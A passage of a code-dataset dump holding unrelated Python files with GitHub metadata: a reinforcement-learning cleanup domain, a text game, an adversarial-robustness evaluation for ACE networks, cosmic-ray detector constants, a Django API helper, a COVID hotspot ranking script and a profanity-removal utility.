block:\n if destination_room_color in block.current_door:\n block.current_room = destination_room_color\n block.current_door = ''\n return next_state\n\n# -----------------------------------\n# Debug functions\n# -----------------------------------\n\ndef debug_l1_domain():\n from simple_rl.tasks.cleanup.cleanup_block import CleanUpBlock\n from simple_rl.tasks.cleanup.cleanup_door import CleanUpDoor\n from simple_rl.tasks.cleanup.cleanup_room import CleanUpRoom\n from simple_rl.tasks.cleanup.cleanup_task import CleanUpTask\n from simple_rl.tasks.cleanup.CleanupMDPClass import CleanUpMDP\n\n def get_l1_policy(domain):\n vi = ValueIteration(domain, sample_rate=1)\n vi.run_vi()\n\n policy = defaultdict()\n action_seq, state_seq = vi.plan(domain.init_state)\n\n print('Plan for {}:'.format(domain))\n for i in range(len(action_seq)):\n print(\"\\tpi[{}] -> {}\\n\".format(state_seq[i], action_seq[i]))\n policy[state_seq[i]] = action_seq[i]\n\n return policy\n\n task = CleanUpTask(\"purple\", \"red\")\n room1 = CleanUpRoom(\"room1\", [(x, y) for x in range(5) for y in range(3)], \"blue\")\n block1 = CleanUpBlock(\"block1\", 1, 1, color=\"green\")\n block2 = CleanUpBlock(\"block2\", 2, 4, color=\"purple\")\n block3 = CleanUpBlock(\"block3\", 8, 1, color=\"orange\")\n room2 = CleanUpRoom(\"room2\", [(x, y) for x in range(5, 10) for y in range(3)], color=\"red\")\n room3 = CleanUpRoom(\"room3\", [(x, y) for x in range(0, 10) for y in range(3, 6)], color=\"yellow\")\n rooms = [room1, room2, room3]\n blocks = [block1, block2, block3]\n doors = [CleanUpDoor(4, 0), CleanUpDoor(3, 2)]\n mdp = CleanUpMDP(task, rooms=rooms, doors=doors, blocks=blocks)\n\n amdp = CleanupL1MDP(mdp)\n\n get_l1_policy(amdp)\n","repo_name":"h2r/ltl-amdp","sub_path":"simple_rl/amdp/abstr_domains/cleanup/AbstractCleanupMDPClass.py","file_name":"AbstractCleanupMDPClass.py","file_ext":"py","file_size_in_byte":14665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"17863013171","text":"\nfrom jogo import estrutura_decisoria\nfrom view import decisao_bowser2_print, decisao_caminho_trabalho_print, decisao_casa_print, decisao_demissao_print, decisao_fake_news_print, decisao_ida_hospital_fome_print, enfrentando_bowser_print\n\n\ndef decisao_casa():\n decisao_casa_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_caminho_trabalho():\n decisao_caminho_trabalho_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_ida_hospital_fome():\n decisao_ida_hospital_fome_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef enfrentando_bowser():\n enfrentando_bowser_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_bowser2(personagem):\n decisao_bowser2_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_demissao(personagem):\n decisao_demissao_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef decisao_fake_news():\n decisao_fake_news_print()\n decisao = int(input(\"--> \"))\n decisao = estrutura_decisoria(decisao)\n return decisao\n\ndef final():\n print(\"Fim de jogo deseja jogar novamente? Digite 1 para sim ou qualquer outra tecla para fechar o jogo\")\n decisao = int(input(\"--> \"))\n if (decisao == 1):\n jogar()","repo_name":"natfontanesi/JogoResilia","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35841213914","text":"import torch\nimport torch.nn as nn\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom typing import List, Tuple, Dict\n\nimport logging\nimport os\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom typing import Union, Tuple, Dict, List\n\nfrom robustabstain.ace.cert_deepTrunk import ai_cert_sample, ai_cert_sample_single_branch\nfrom robustabstain.ace.deepTrunk_networks import MyDeepTrunkNet\nfrom robustabstain.ace.networks import translate_net_name\nfrom robustabstain.ace.utils import AdvAttack\nfrom robustabstain.attacker.wrapper import AttackerWrapper\nfrom robustabstain.eval.log import write_sample_log, write_eval_report\nfrom robustabstain.utils.data_utils import get_dataset_stats\nfrom robustabstain.utils.helpers import convert_floatstr\nfrom robustabstain.utils.loaders import get_rel_sample_indices\nfrom robustabstain.utils.metrics import AverageMeter\nfrom robustabstain.utils.paths import eval_attack_log_filename\n\n\n\ndef build_ace_net(args: object, ace_model_path: str, device: str) -> MyDeepTrunkNet:\n \"\"\"Build an ACE network given by model path args.model.\n\n Args:\n args (object): Any object subclass exposing 'setattr` and 'getattr'.\n ace_model_path (str): Path to saved ACE model.\n device (str): device.\n\n Returns:\n MyDeepTrunkNet: Loaded ACE network (=Deeptrunk network)\n \"\"\"\n args.branch_nets = [translate_net_name(net) for net in args.branch_nets] if isinstance(args.branch_nets,list) else translate_net_name(args.branch_nets)\n args.gate_nets = None if args.gate_nets is None else [translate_net_name(net) for net in args.gate_nets]\n\n lossFn = nn.CrossEntropyLoss(reduction='none')\n def evalFn(x): return torch.max(x, dim=1)[1]\n input_dim, num_channels, num_classes = get_dataset_stats(args.dataset)\n dTNet = MyDeepTrunkNet.get_deepTrunk_net(\n args, device, lossFn, evalFn, input_dim, num_channels, num_classes, model_path=ace_model_path\n )\n\n return dTNet\n\n\ndef ace_eval(\n args: object, dTNet: MyDeepTrunkNet, device: str,\n test_loader: torch.utils.data.DataLoader, adv_norm: str,\n test_eps: str, cert_domain: str\n ) -> Tuple[\n Dict[str, float], np.ndarray, np.ndarray, np.ndarray,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray\n ]:\n \"\"\"Evaluate natural accuracy, empirical robustness, certified robustness and gate selection on a given\n ACE architecture. This evaluation assumes that only a single branch model is present in the ACE model.\n Further, a trunk model that may be present is ignored, meaning only the gate (selector) network and the\n branch\n\n\n\n\n\n network are evaluated.\n\n Args:\n args (object): Any object subclass exposing 'setattr` and 'getattr'.\n dTNet (MyDeepTrunkNet): Deeptrunk network (ACE architecture).\n device (str): device.\n test_loader (torch.utils.data.DataLoader): PyTorch loader with test data.\n adv_norm (str): Norm of the perturbation region.\n test_eps (str): Size of adversarial perturbation region (stringified).\n cert_domain (str): Certification domain. Must be 'zono' for COLT trained models\n and 'box' for IBP trained models.\n\n Returns:\n Tuple[Dict[str, float], np.ndarray, np.ndarray, np.ndarray,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n Dict containing model measures, natural predictions, array indicating accuracy,\n array indicating empirical robustness, array indicating certified robustness,\n array indicating selection by gate net, array indicating empirical robustness of\n selector, array indicating certified robustness of selector, sample indices.\n \"\"\"\n assert len(dTNet.gate_nets.keys()) == 1, 'Only evaluation of single branch ACE models supported.'\n exit_idx = 0\n dTNet.trunk_net = None # we dont care about the trunk\n dTNet.eval()\n dTNet.gate_nets[exit_idx].eval()\n dTNet.branch_nets[exit_idx].eval()\n\n test_eps_float = convert_floatstr(test_eps)\n n_samples = len(test_loader.dataset)\n nat_predictions = np.zeros(n_samples, dtype=np.int64)\n is_acc = np.zeros(n_samples, dtype=np.int64)\n is_rob = np.zeros(n_samples, dtype=np.int64)\n is_cert = np.zeros(n_samples, dtype=np.int64)\n is_select = np.zeros(n_samples, dtype=np.int64)\n select_rob = np.zeros(n_samples, dtype=np.int64) # gate predictions that are empirically robust\n select_cert = np.zeros(n_samples, dtype=np.int64) # gate predictions that are certifiable robust\n indices = np.zeros(n_samples, dtype=np.int64)\n\n adv_attack_gate = AdvAttack(\n eps=test_eps_float, n_steps=args.test_att_n_steps,\n step_size=args.test_att_step_size, adv_type=\"pgd\"\n )\n attacker = AttackerWrapper(\n adv_type=args.test_adv_attack, adv_norm=adv_norm, eps=test_eps_float, steps=args.test_att_n_steps,\n rel_step_size=args.test_att_step_size, version=args.autoattack_version,\n gamma_ddn=args.gamma_ddn, init_norm_ddn=args.init_norm_ddn, device=device\n )\n\n nat_acc = AverageMeter()\n rob_acc = AverageMeter()\n cert_acc = AverageMeter()\n selection_rate = AverageMeter()\n selection_rate_adv = AverageMeter()\n selection_rate_cert = AverageMeter()\n\n pbar = tqdm(test_loader, dynamic_ncols=True)\n for batch_idx, (inputs, targets, sample_indices) in enumerate(pbar):\n rel_sample_indices = get_rel_sample_indices(test_loader, sample_indices)\n inputs, targets = inputs.to(device), targets.to(device)\n\n gate_nat_out = dTNet.gate_nets[exit_idx](inputs).squeeze()\n nat_select = (gate_nat_out >= dTNet.threshold[exit_idx]).int()\n nat_out = dTNet.branch_nets[exit_idx](inputs)\n nat_pred = nat_out.argmax(1)\n\n \"\"\"GT Labels for attack are the predicted labels.\n This is necessary for the attack to also search\n for adversarial samples for inaccurate samples.\n \"\"\"\n _, _, _, adv_inputs, _ = dTNet.get_adv_loss(inputs, nat_pred, adv_attack_gate)\n gate_adv_out = dTNet.gate_nets[exit_idx](adv_inputs).squeeze()\n adv_select = gate_adv_out >= dTNet.threshold[exit_idx]\n\n adv_inputs = attacker.attack(dTNet.branch_nets[exit_idx], inputs, nat_pred)\n adv_out = dTNet.branch_nets[exit_idx](adv_inputs)\n adv_pred = adv_out.argmax(1)\n\n is_acc_batch = nat_pred.eq(targets).int().cpu().numpy()\n is_select_batch = nat_select.int().cpu().numpy()\n is_rob_batch = adv_pred.eq(nat_pred).int().cpu().numpy()\n select_rob_batch = adv_select.eq(nat_select).int().cpu().numpy()\n\n nat_predictions[rel_sample_indices] = nat_pred.cpu().numpy()\n is_acc[rel_sample_indices] = is_acc_batch\n is_rob[rel_sample_indices] = is_rob_batch\n is_select[rel_sample_indices] = is_select_batch\n select_rob[rel_sample_indices] = select_rob_batch\n indices[rel_sample_indices] = sample_indices\n\n for input, target, pred, select, rel_sample_idx in zip(inputs, targets, nat_pred, nat_select, rel_sample_indices):\n input, target = input.unsqueeze(0), target.unsqueeze(0)\n pred, select = pred.unsqueeze(0), select.unsqueeze(0)\n with torch.no_grad():\n is_cert_gate, is_cert_branch = ai_cert_sample_single_branch(\n dTNet, input, pred, select, cert_domain, test_eps_float\n )\n is_cert[rel_sample_idx] = is_cert_branch.item()\n select_cert[rel_sample_idx] = is_cert_gate.item()\n\n cert_acc.update(100 * is_cert_branch.item() * target.eq(pred).item(), 1)\n selection_rate_cert.update(100 * select.item() * is_cert_gate.item(), 1)\n nat_acc.update(100 * np.average(is_acc_batch), inputs.size(0))\n rob_acc.update(100 * np.average(is_rob_batch & is_acc_batch), inputs.size(0))\n selection_rate.update(100 * np.average(is_select_batch), inputs.size(0))\n selection_rate_adv.update(100 * np.average(is_select_batch & select_rob_batch), inputs.size(0))\n\n pbar.set_description('[V] ACE ({} eps={}): nat_acc={:.4f}, adv_acc={:.4f}, cert_acc={:.4f}, ' \\\n 'sel_rate_nat={:.4f}, sel_rate_adv={:.4f}, sel_rate_cert={:.4f},'.format(\n args.adv_norm, test_eps, nat_acc.avg, rob_acc.avg, cert_acc.avg,\n selection_rate.avg, selection_rate_adv.avg, selection_rate_cert.avg\n ))\n\n accs = {\n 'nat_acc': round(nat_acc.avg, 2),\n 'adv_acc': round(rob_acc.avg, 2),\n 'cert_acc': round(cert_acc.avg, 2),\n }\n\n return accs, nat_predictions, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, indices\n\n\ndef get_indicator_from_log(\n log_path: str, eps_str: str\n ) -> Tuple[bool, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"Extract '{model_name}_is_acc', '{model_name}_is_rob{eps}', '{model_name}_is_cert{eps}',\n '{model_name}_is_select' columns from sample log.\n\n Args:\n log_path (str): Path to log file.\n eps_str (str): Perturbation region size.\n\n\n Returns:\n Tuple[bool, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n Indicators found, accuracy indicator, robustness indicator, certification indicator,\n ACE selector indicator, empirical robustness of selector, certified robustness of selector,\n natural predictions of branch\n \"\"\"\n indicators_found, is_acc, is_rob, is_cert = False, None, None, None\n is_select, select_rob, select_cert, pred = None, None, None, None\n if not os.path.isfile(log_path):\n logging.info(f'No log file {log_path} found, evaluating instead')\n return indicators_found, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, pred\n\n log_df = pd.read_csv(log_path, index_col=0)\n indices_col = [col for col in log_df.columns if 'sample_idx' in col]\n is_acc_col = [col for col in log_df.columns if 'is_acc' in col]\n is_rob_col = [col for col in log_df.columns if f'is_rob{eps_str}' in col]\n is_cert_col = [col for col in log_df.columns if f'is_cert{eps_str}' in col]\n is_select_col = [col for col in log_df.columns if 'is_select' in col]\n select_rob_col = [col for col in log_df.columns if 'select_rob' in col]\n select_cert_col = [col for col in log_df.columns if 'select_cert' in col]\n pred_col = [col for col in log_df.columns if 'pred' in col]\n\n if (len(is_acc_col) != 1 or len(is_rob_col) != 1 or len(is_cert_col) != 1 or\n len(is_select_col) != 1 or len(select_rob_col) != 1 or len(select_cert_col) != 1 or\n len(pred_col) != 1):\n logging.info(f'Not all columns found in logfile {log_path}, evaluating instead.')\n\n return indicators_found, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, pred\n\n indicators_found = True\n indices = log_df[indices_col[0]].to_numpy()\n is_acc = log_df[is_acc_col[0]].to_numpy()\n is_rob = log_df[is_rob_col[0]].to_numpy()\n is_cert = log_df[is_cert_col[0]].to_numpy()\n is_select = log_df[is_select_col[0]].to_numpy()\n select_rob = log_df[select_rob_col[0]].to_numpy()\n select_cert = log_df[select_cert_col[0]].to_numpy()\n pred = log_df[pred_col[0]].to_numpy()\n\n return indicators_found, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, pred\n\n\ndef get_ace_indicator(\n args: object, dTNet: MyDeepTrunkNet, model_dir: str, model_name: str, device: str,\n dataloader: torch.utils.data.DataLoader, eval_set: str, adv_norm: str, eps_str: str,\n use_existing: bool = False, write_log: bool = False, write_report: bool = False\n ) -> Tuple[\n float, float, float, np.ndarray, np.ndarray, np.ndarray,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray\n ]:\n \"\"\"Get 0-1 indicators for each sample on whether the given ACE model is accurate,\n empirically robust, certifably robust, selected by gate network, for the given perturbation region.\n If no existing sample log is found in the model_dir, the model is evaluated from scratch.\n This evaluation assumes that only a single branch model is present in the ACE model\n and a trunk model that may be present is ignored, meaning only the gate (selector) network\n and the branch network are evaluated.\n\n Args:\n args (object): Any object subclass exposing 'setattr` and 'getattr'.\n dTNet (MyDeepTrunkNet): Deeptrunk network (ACE architecture).\n model_dir (str): Directory in which the model is stored (and associated eval logs).\n model_name (str): Name of the model to evaluate.\n device (str): device.\n dataloader (torch.utils.data.DataLoader): Dataloader to evaluate.\n eval_set (str): Dataset split that is evaluated ('train', 'val', 'test').\n adv_norm (str): Norm of the adversarial perturbation region.\n eps_str (str): Perturbation region size.\n use_existing (bool, optional): If set, an existing model eval log will be used (if such a log exists).\n write_log (bool, optional): If set, the evaluation log will be written to file. Defaults to False.\n write_report (bool, optional): If set, evaluation report will be written. Defaults to False.\n\n Returns:\n Tuple[float, float, float, np.ndarray, np.ndarray, np.ndarray,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n nat. accuracy of branch, adv. accuracy of branch, cert. accuracy of branch, accuracy indicator,\n empirical robustness indicator, certified robustness indicator, gate selection indicator,\n gate empirical robustness, gate certified robustness, branch natural predictions\n \"\"\"\n # get indices order of samples in dataloader\n dataset_indices = np.arange(len(dataloader.dataset))\n if type(dataloader.dataset) == torch.utils.data.dataset.Subset:\n # Subset dataset have random index order\n dataset_indices = dataloader.dataset.indices\n\n # check first whether a log exists\n log_name = eval_attack_log_filename(eval_set, args.dataset, adv_norm, 'pgd')\n log_path = os.path.join(model_dir, log_name)\n indicators_found, is_acc, is_rob, is_cert, is_select, \\\n select_rob, select_cert, predictions = get_indicator_from_log(log_path, eps_str)\n\n if indicators_found and use_existing:\n nat_acc1 = round(100.0 * np.average(is_acc[dataset_indices]), 2)\n adv_acc1 = round(100.0 * np.average(is_acc[dataset_indices] & is_rob[dataset_indices]), 2)\n cert_acc1 = round(100.0 * np.average(is_acc[dataset_indices] & is_cert[dataset_indices]), 2)\n select_rate = round(100.0 * np.average(is_select[dataset_indices]), 2)\n is_acc = is_acc[dataset_indices]\n is_rob = is_rob[dataset_indices]\n is_cert = is_cert[dataset_indices]\n is_select = is_select[dataset_indices]\n select_rob = select_rob[dataset_indices]\n select_cert = select_cert[dataset_indices]\n predictions = predictions if predictions is None else predictions[dataset_indices]\n\n return nat_acc1, adv_acc1, cert_acc1, is_acc, is_rob, is_cert, \\\n is_select, select_rob, select_cert, predictions, dataset_indices\n\n # it is possible to run this function without a model given that a logfile is available\n if dTNet is None:\n raise ValueError(f'Error: no model provided and indicators not found in log {log_path}.')\n\n # put dataset into sequential dataloader to get deterministic sample order\n seq_dataloader = torch.utils.data.DataLoader(\n dataset=dataloader.dataset, batch_size=dataloader.batch_size,\n shuffle=False, num_workers=dataloader.num_workers\n )\n\n cert_domain = 'zono' if 'COLT' in model_name else 'box'\n accs, nat_preds, is_acc, is_rob, is_cert, is_select, select_rob, select_cert, indices = ace_eval(\n args, dTNet, device, seq_dataloader, args.adv_norm, eps_str, cert_domain\n )\n assert (indices == dataset_indices).all(), 'Indices of ACE evaluation are not in expected order.'\n nat_acc1 = accs['nat_acc']\n adv_acc1 = accs['adv_acc']\n cert_acc1 = accs['cert_acc']\n\n if write_report:\n write_eval_report(\n args, out_dir=model_dir, nat_accs=[nat_acc1], adv_accs={eps_str: adv_acc1},\n adv_attack='pgd', dcert_accs={eps_str: cert_acc1}\n )\n\n if write_log:\n write_sample_log(\n model_name, model_dir, args.dataset, args.eval_set, args.adv_norm, 'pgd',\n indices=indices, is_acc=is_acc, preds=nat_preds, is_rob=is_rob,\n is_cert=is_cert, is_select=is_select, select_rob=select_rob,\n select_cert=select_cert, eps=eps_str\n )\n\n return nat_acc1, adv_acc1, cert_acc1, is_acc, is_rob, is_cert, \\\n is_select, select_rob, select_cert, predictions, dataset_indices","repo_name":"ymerkli/robust-abstain","sub_path":"robustabstain/eval/ace.py","file_name":"ace.py","file_ext":"py","file_size_in_byte":16865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"7772489703","text":"import numpy as np\nfrom datetime import date\nfrom scipy import integrate\nfrom astropy import units as u\nfrom astropy.coordinates import EarthLocation\n\nfrom .exposure import m_integrand, kappa_dval\n\n\"\"\"\nConstants from information provided in Auger Collabration publications on the 2022 dataset.\n\n* latitude and longitude taken from Auger Collaboration 2008.\n* Information on periods and exposures from Auger Collaboration et al. 2022 (arXiv:2206.13492).\n* M values calculated by integrating the m_integrand in exposure.py\nover the unit sphere for certain values of theta_m. \n\n@author Keito Watanabe\n@date September 2022\n\"\"\"\n\n# position of the PAO [rad]\nlat = np.deg2rad(-35.2)\nlon = np.deg2rad(-69.4)\nheight = 1400 # [m]\nauger_location = EarthLocation(lat = lat * u.rad, lon = lon * u.rad,\n height = height * u.m)\n\n# threshold zenith angle\ntheta_m = np.deg2rad(80)\n\n# start year of observation\nstart_year = 2004\n\n# get total period as the Eth is different from 2014 dataset\nperiod_start = date(2004, 1, 1)\nperiod_end = date(2020, 12, 31)\n\n# length of each period in years\ndeltat = (period_end - period_start).days / 365.25\n\n# total exposure, vertical and inclined in km^2 sr yr\nalpha_T_vert = 95700\nalpha_T_incl = 26300\nalpha_T = alpha_T_vert + alpha_T_incl\n\n# calculate M (integral over exposure factor) [sr]\ndetector_params = []\ndetector_params.append(np.cos(lat))\ndetector_params.append(np.sin(lat))\ndetector_params.append(np.cos(theta_m))\ndetector_params.append(alpha_T)\nM, Merr = integrate.quad(m_integrand, 0, np.pi, args = detector_params)\ndetector_params.append(M)\n\n# calculate effective area in km^2\nA = alpha_T / (M * deltat)\nA_incl = alpha_T_incl / (M * deltat)\nA_vert = alpha_T_vert / (M * deltat)\n\n# reconstruction uncertainty for arrival direction\nsig_omega = 1.0\nkappa_d = kappa_dval(sig_omega)\n\n# reconstruction uncertainty for energy\n# calibration unc ~ 14%, SD resolution ~ 7%, add in quadrature\nf_E = 0.156\n\n# threshold energy [EeV]\nEth = 32\n\n# For convenience\ndetector_properties = {}\ndetector_properties['label'] = 'auger2022'\ndetector_properties['lat'] = lat\ndetector_properties['lon'] = lon\ndetector_properties['height'] = height\ndetector_properties['theta_m'] = theta_m\ndetector_properties['kappa_d'] = kappa_d\ndetector_properties['f_E'] = f_E\ndetector_properties['A'] = A\ndetector_properties['alpha_T'] = alpha_T\ndetector_properties['Eth'] = Eth\ndetector_properties[\"start_year\"] = start_year","repo_name":"cescalara/fancy","sub_path":"fancy/detector/auger2022.py","file_name":"auger2022.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"23178482697","text":"import json\nimport logging\nfrom typing import List\n\nimport urllib3.exceptions\nfrom django.conf import settings\nfrom django.http import Http404, HttpResponseNotFound\nfrom rest_framework.settings import api_settings\n\nfrom base.models.person import Person\nfrom frontoffice.settings.osis_sdk.utils import build_mandatory_auth_headers\n\nlogger = logging.getLogger(settings.DEFAULT_LOGGER)\n\n\nclass ServiceException(Exception):\n def __init__(self, api_exception, *args, **kwargs):\n self.original_exception = api_exception\n super().__init__(*args, **kwargs)\n\n @property\n def messages(self) -> List[str]:\n json_body = json.loads(self.original_exception.body)\n return list({error['detail'] for error in json_body[api_settings.NON_FIELD_ERRORS_KEY]})\n\n @property\n def status(self):\n return self.original_exception.status\n\n\ndef call_api(settings_sdk, sdk, api, person: 'Person', method_to_call: str, **kwargs):\n configuration = settings_sdk.build_configuration()\n with sdk.ApiClient(configuration) as api_client:\n\n api_instance = api(api_client)\n try:\n class_method = getattr(api_instance, method_to_call)\n result = class_method(**build_mandatory_auth_headers(person), **kwargs)\n except sdk.ApiException as api_exception:\n logger.warning(api_exception)\n if api_exception.status == HttpResponseNotFound.status_code:\n raise Http404\n raise ServiceException(api_exception)\n except (urllib3.exceptions.HTTPError, Http404) as e:\n # Run in degraded mode in order to prevent crash all app\n logger.error(e)\n return None\n return result\n","repo_name":"uclouvain/osis-portal","sub_path":"base/services/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"13359393590","text":"import pandas as pd\r\n\r\ndef topdistricts(df, time_id):\r\n time_id_list = []\r\n method_list = []\r\n spot_list = []\r\n district_id1_list = []\r\n district_id2_list = []\r\n district_id3_list = []\r\n district_id4_list = []\r\n district_id5_list = []\r\n \r\n if (time_id == 'week'):\r\n upper = 26\r\n elif (time_id == 'month'):\r\n upper = 8\r\n elif (time_id == 'overall'):\r\n upper = 2\r\n \r\n for i in range(1, upper):\r\n df_temp = df[df['timeid'] == i]\r\n \r\n df_largest = df_temp.nlargest(5, ['neighborhoodzscore'])\r\n time_id_list.append(i)\r\n method_list.append('neighborhood')\r\n spot_list.append('hot')\r\n \r\n district_id1_list.append(df_largest.iloc[0, 0])\r\n district_id2_list.append(df_largest.iloc[1, 0])\r\n district_id3_list.append(df_largest.iloc[2, 0])\r\n district_id4_list.append(df_largest.iloc[3, 0])\r\n district_id5_list.append(df_largest.iloc[4, 0])\r\n \r\n df_largest_state = df_temp.nlargest(5, ['statezscore'])\r\n time_id_list.append(i)\r\n method_list.append('state')\r\n spot_list.append('hot')\r\n district_id1_list.append(df_largest_state.iloc[0, 0])\r\n district_id2_list.append(df_largest_state.iloc[1, 0])\r\n district_id3_list.append(df_largest_state.iloc[2, 0])\r\n district_id4_list.append(df_largest_state.iloc[3, 0])\r\n district_id5_list.append(df_largest_state.iloc[4, 0])\r\n \r\n df_smallest = df_temp.nsmallest(5, ['neighborhoodzscore'])\r\n time_id_list.append(i)\r\n method_list.append('neighborhood')\r\n spot_list.append('cold')\r\n district_id1_list.append(df_smallest.iloc[0, 0])\r\n district_id2_list.append(df_smallest.iloc[1, 0])\r\n district_id3_list.append(df_smallest.iloc[2, 0])\r\n district_id4_list.append(df_smallest.iloc[3, 0])\r\n district_id5_list.append(df_smallest.iloc[4, 0])\r\n \r\n df_smallest_state = df_temp.nsmallest(5, ['statezscore'])\r\n time_id_list.append(i)\r\n method_list.append('state')\r\n spot_list.append('cold')\r\n district_id1_list.append(df_smallest_state.iloc[0, 0])\r\n district_id2_list.append(df_smallest_state.iloc[1, 0])\r\n district_id3_list.append(df_smallest_state.iloc[2, 0])\r\n district_id4_list.append(df_smallest_state.iloc[3, 0])\r\n district_id5_list.append(df_smallest_state.iloc[4, 0])\r\n \r\n df_top = pd.DataFrame(list(zip(time_id_list, method_list, spot_list, district_id1_list, district_id2_list, district_id3_list, district_id4_list, district_id5_list)), columns= ['timeid', 'method', 'spot', 'districtid1', 'districtid2', 'districtid3', 'districtid4', 'districtid5']) \r\n return df_top\r\n\r\ndf_zscore_week = pd.read_csv('zscore-week.csv')\r\ndf_top_week = topdistricts(df_zscore_week, 'week')\r\ndf_top_week.to_csv('top-week.csv', index=False)\r\n\r\ndf_zscore_month = pd.read_csv('zscore-month.csv')\r\ndf_top_month = topdistricts(df_zscore_month, 'month')\r\ndf_top_month.to_csv('top-month.csv', index=False)\r\n\r\ndf_zscore_overall = pd.read_csv('zscore-overall.csv')\r\ndf_top_overall = topdistricts(df_zscore_overall, 'overall')\r\ndf_top_overall.to_csv('top-overall.csv', index=False)","repo_name":"gaganmangat/COVID-19-Analysis-System","sub_path":"8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24036463641","text":"import os\nimport re\nimport pandas as pd\nfrom tqdm import tqdm\n\nclass Zerofucks:\n '''Class container for profanity parser utility\n\n # instantiate class\n myFinder = Zerofucks()\n \n # load in bad words list from file,\n # write to list my_badwords\n my_badwords = []\n badwords_file = open('./bad_words.txt', \"r\").readlines()\n for line in badwords_file:\n my_badwords.append(line.rstrip())\n '''\n \n def __init__(self):\n self.df = pd.DataFrame(\n {'file': [], 'line_no': [], 'badword': [], 'content': []}, \n columns=['file', 'line_no', 'badword', 'content']\n )\n \n def __makeRegex__(self, shitToFind=[\"fuck\", \"shit\"]):\n '''\n shitToFind is a list of word literals,\n uses word boundary \\b\n\n returns a regex string\n '''\n shitString = ''\n for word in shitToFind:\n # shitString += r\"\\b\" + word + r\"\\b|\"\n \n # case insensitive (?i) has deprecation warning:\n # https://github.com/bottlepy/bottle/issues/949\n shitString += r\"(?i)\\b\" + word + r\"\\b|\"\n return shitString[:-1]\n \n def write_df(self, path='./', filename='out.csv'):\n '''\n path: path to where you want to put the file\n filename: name of file\n \n Writes the csv from self.df to a csv file\n '''\n try:\n self.df.to_csv(path_or_buf=path + filename, index=False, chunksize=1000)\n print(\"File written to {}\".format(path + filename))\n except:\n print(\"Unable to write csv, did you run .find_shit() yet?\")\n \n def erase_in_file(self, input_file, replace_with='', postfix='', bad_words=['fuck', 'shit']):\n '''\n Erases any bad words from the user specified files.\n \n Takes an input file and writes to an outputfile.\n ALSO returns a dictionary for forensic - what did you change - purposes\n \n input_file: full path to the file you want to process / remove bad words from\n replace_with: the string you'll be replacing the bad word with (defaults to nothing, '')\n postfix: optional string value you want to add to the end of the outputfile. If blank, it'll overwrite the input file.\n '''\n \n print('Replacing bad words in {}...'.format(input_file))\n try:\n tempfile = open(input_file + '.tmp', mode='w')\n with open(input_file, 'r', encoding='iso-8859-15') as infile:\n shit_dict = {}\n for content in tqdm(infile):\n if len(re.findall(self.__makeRegex__(bad_words), content)) > 0:\n if re.findall(self.__makeRegex__(bad_words), content)[0] in shit_dict:\n shit_dict[re.findall(self.__makeRegex__(bad_words), content)[0]] += 1\n else:\n shit_dict[re.findall(self.__makeRegex__(bad_words), content)[0]] = 1\n # the '' in this line is what to replace the bad words with. In this case, nothing at all.\n tempfile.write(re.sub(self.__makeRegex__(bad_words), replace_with, content))\n # write the tempfile contents to the original file \n print('overwriting {} with {}'.format(input_file+'.tmp', input_file+postfix))\n os.rename(input_file + '.tmp', input_file+postfix)\n return shit_dict\n except ValueError:\n print(f'Unable to replace bad words in {input_file}.')\n \n def erase_in_dirs(self, root_paths, postfix='', bad_words=['fuck', 'shit'], ignore_extensions=['ipynb']):\n '''\n root_paths: LIST of directories to replace shit in. Must be a list. Cannot be a specific file.\n postfix: string to add to the end of the name of the output file. If input is 'myFile.csv' with a postfix of '_new', the scrubbed file would be 'myFile.csv_new'. No prefix overwrites the existing file.\n bad_words: optional list of words to replace in the files within root_paths\n '''\n \n audit_log = {\n 'ignored': [],\n 'processed': []\n }\n\n for root_path in root_paths:\n for (root, dirs, files) in os.walk(root_path):\n for name in files:\n try:\n # if the file extension is one we want to ignore\n file_ext = name.split('.')[-1]\n if file_ext in ignore_extensions:\n print(f'ignoring {self.__get_path(root, dirs, name)}')\n # add the filename to the ignored section of the audit_log\n audit_log['ignored'].append(self.__get_path(root, dirs, name))\n continue\n # otherwise, we'll erase shit in it\n else:\n print(f'deleting shit in {self.__get_path(root, dirs, name)}')\n self.erase_in_file(root+'/'+name, postfix=postfix, bad_words=bad_words)\n audit_log['processed'].append(self.__get_path(root, dirs, name))\n # if the filename has no extension, we still process it\n except:\n print(f'no file extension in {self.__get_path(root, dirs, name)}, erasing shit anyway')\n 